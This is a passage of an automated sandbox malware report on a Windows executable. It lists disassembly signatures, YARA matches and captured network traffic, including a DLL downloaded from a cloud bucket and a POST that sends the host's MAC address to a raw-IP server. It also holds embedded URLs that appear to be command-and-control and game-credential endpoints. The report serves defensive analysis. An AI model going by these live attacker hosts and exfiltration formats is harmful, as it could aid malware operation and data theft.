Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-34h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-38h], esp | 0_2_00484C33
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-30h], esp | 0_2_004145B5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004B4CE2
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0046ECEB
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0040ECF1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0040ECF1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0040ECF1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_0040ECF1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00480CFD
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00450C8D
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-44h], esp | 0_2_004BEC9B
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_004B4C9A
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00448CB6
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00470D4D
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_004B4D5C
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004C8D69
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_00474D78
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004C4D06
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-0Ch], esp | 0_2_004C4D06
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_00482D34
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004A0DC9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004A0DC9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_004A0DC9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-04h], esp | 0_2_0046EDD5
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_00450DD1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004A8DD6
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-18h], esp | 0_2_004B2E47
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-24h], esp | 0_2_004B2E47
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_0043EE51
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-08h], esp | 0_2_0043EE51
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004C8E01
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_004C8E01
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-10h], esp | 0_2_004C8E01
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426E31
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426E31
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-14h], esp | 0_2_00426E31
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-28h], esp | 0_2_004B4EF3
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-24h], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-1Ch], esp | 0_2_00456EF9
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 4x nop then cmp dword ptr [ebp-20h], esp | 0_2_00456EF9

Networking

Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 8000
Source: unknown | Network traffic detected: HTTP traffic on port 8000 -> 49730
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 43.226.78.44:8000
Source: global traffic | TCP traffic: 192.168.2.4:63072 -> 1.1.1.1:53
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /8001.dll HTTP/1.1
    Accept: */*
    Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
    Accept-Language: zh-cn
    User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
    Host: cesg1.oss-cn-beijing.aliyuncs.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /macweb/submit/ HTTP/1.1
    Accept: */*
    Referer: http://43.226.78.44:8000/macweb/submit/
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
    Host: 43.226.78.44:8000
    Content-Length: 49
    Cache-Control: no-cache
    Data Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38
    Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | TCP traffic detected without corresponding DNS query: 43.226.78.44
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_00404C1A InternetOpenA,InternetOpenA,InternetOpenA,InternetOpenA,InternetConnectA,InternetCloseHandle,HttpOpenRequestA,InternetCloseHandle,InternetCloseHandle,InternetSetOptionA,HttpSendRequestA,HttpSendRequestA,InternetReadFile,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00404C1A
Source: global traffic | HTTP traffic detected:
    GET /8001.dll HTTP/1.1
    Accept: */*
    Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
    Accept-Language: zh-cn
    User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
    Host: cesg1.oss-cn-beijing.aliyuncs.com
    Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: cesg1.oss-cn-beijing.aliyuncs.com
Source: unknown | HTTP traffic detected:
    POST /macweb/submit/ HTTP/1.1
    Accept: */*
    Referer: http://43.226.78.44:8000/macweb/submit/
    Accept-Language: zh-cn
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
    Host: 43.226.78.44:8000
    Content-Length: 49
    Cache-Control: no-cache
    Data Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38
    Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: http://.https
Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://43.226.78.44:8000/macweb/submit/
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url
Source: 8001[1].dll.0.dr | String found in binary or memory: http://61.160.207.3:8003/api
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://bbs.dult.cn/thread-24328-1-1.html
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0?
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://crl.certum.pl/ca.crl0h
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crls.pki.jemmylovejenny.tk/EVRootCA.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://i.2.wen888.shop:4002/index/user.html
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold=
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://ocsp.certum.pl0.
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.pki.jemmylovejenny.tk/EVRootCA0=
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://pv.sohu.com/cityjson
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://repository.certum.pl/ca.cer0:
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://repository.certum.pl/ctnca.cer0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://repository.certum.pl/l3.cer0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://subca.ocsp-certum.com0.
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://subca.ocsp-certum.com01
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: http://www.certum.pl/CPS0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.dult.cn/100.txt
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.eyuyan.com
Source: 1734098836319.exe, 8001[1].dll.0.dr | String found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.eyuyan.comservice
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://Mozilla/4.0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://User-Agent:Mozilla/4.0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://api.ip.sb/ip
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://api.ttt.sh/ip/qqwry/
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://api.ttt.sh/ip/qqwry/ip
Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/
Source: 1734098836319.exe, 00000000.00000002.2952794089.000000000089E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp, submit[1].json.0.dr | String found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
Source: 1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo
Source: 1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cesg1.oss-cn-beijing.aliyuncs.com/;W
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://ip.cn/index.php
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://pki.jemmylovejenny.tk/cps0/
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://pki.jemmylovejenny.tk/rpa0
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://wwug.lanzouq.com/huohanqqq
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://wwug.lanzouq.com/huohanqqqQ.dll
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://wwug.lanzouq.com/huohansss
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://wwug.lanzouq.com/huohanssss.dll
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: https://www.certum.pl/CPS0
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.dr | String found in binary or memory: https://www.certum.pl/repository.0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.ip138.com
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.ip138.comUser-Agent:
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://www.lanzout.com
Source: 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.dr | String found in binary or memory: https://www.lanzout.comRefererMozilla/5.0
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.uc.cn/ip
Source: 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson
Source: 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.wegame.com.cn/api/v1/wegame.platform.game.TicketProxy/GetGameTicket
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | HTTPS traffic detected: 39.103.20.61:443 -> 192.168.2.4:49731 version: TLS 1.2

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: Yara match | File source: 0.3.1734098836319.exe.3273080.25.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.32f0000.8.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.676c1f.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.1734098836319.exe.3241c70.24.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.66a062.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.1734098836319.exe.323ec70.23.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.1734098836319.exe.3273080.25.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.66070f.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.1734098836319.exe.3241c70.24.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.4f0c05.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.1734098836319.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 1734098836319.exe PID: 7472, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, type: DROPPED
                    Source: C:\Users\user\Desktop\1734098836319.exe | Code function: 0_2_004154F3 CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt
